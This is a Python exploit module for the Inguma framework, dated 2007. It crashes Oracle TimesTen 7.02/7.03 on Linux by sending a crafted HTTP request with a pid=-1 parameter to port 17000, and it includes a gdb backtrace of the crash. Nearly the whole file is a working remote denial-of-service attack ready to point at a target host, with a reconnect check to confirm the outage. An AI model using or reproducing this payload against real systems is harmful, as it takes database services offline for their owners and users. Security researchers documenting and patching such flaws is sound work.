#!/usr/bin/python

"""
Oracle TimesTen 7.02 Remote DOS #2 for Inguma
Copyright (c) 2007 Joxean Koret <joxeankoret@yahoo.es>

License is GPL
"""

"""
Tested against Oracle TimesTen 7.02 on GNU/Linux.

(gdb) print %al
void
(gdb) x /i $pc
0xb7695d1a <strcmp+10>: cmp    (%edx),%al
(gdb) where
#0  0xb7695d1a in strcmp () from /lib/tls/i686/cmov/libc.so.6
#1  0x080567c5 in daDbQueryByName ()
#2  0x0805bbe0 in daRecovery ()
#3  0x08073854 in handlerThread ()
#4  0xb7782341 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
#5  0xb76f54ee in clone () from /lib/tls/i686/cmov/libc.so.6
"""
import sys
import time
import socket

from lib.libexploit import CIngumaModule

name = "oratt70dos2"
brief_description = "Oracle Times Ten 70 Remote DOS #2"
type = "exploit"
affects = ["Oracle TimesTen 7.02 and 7.03"]
description = """
Oracle TimesTen 7.0X is vulnerable to multiple remote denial of service conditions.
That one exploits a vulnerability found only in Linux versions.
"""
patch = "Fixed in version 7.0.5"
category = "dos"
discoverer = "Joxean Koret"
author = "Joxean Koret <joxeankoret@yahoo.es>"

class COraTt702(CIngumaModule):
    target = ""
    port = 17000
    waitTime = 0
    timeout = 1
    exploitType = 1
    services = {}
    results = {}
    dict = None
    interactive = True

    def runDos(self, target, port):

        # What the TimesTen server doesn't like is the pid=-1 parameter.
        buf = "GET hello?pid=-1&type=library&payload=%00%00%00%00&protocolID=TimesTen%207%2e0%2e2%2e0%2e0%2ett70&ident=%00%00%00%00 HTTP/1.0\r\n\r\n\r\n"

        try:
            socket.setdefaulttimeout(self.timeout)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((target, port))
            s.send(buf)
            s.close()

            print "Exploit sended, waiting for a while..."
            time.sleep(3)

            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((target, port))
                s.close()

                print "Exploit doesn't work :("
                return False
            except:
                print "Exploit works!"
                return False

            return True
        except:
            print "Error:", sys.exc_info()[1]
            return False

    def run(self):

        if self.target == "" or self.target is None:
            self.target = "localhost"

        if self.port == 0 or self.port is None:
            self.port = 17000

        return self.runDos(self.target, self.port)

    def printSummary(self):
        """ If the method run of the module returns True printSummary will called after """
        pass
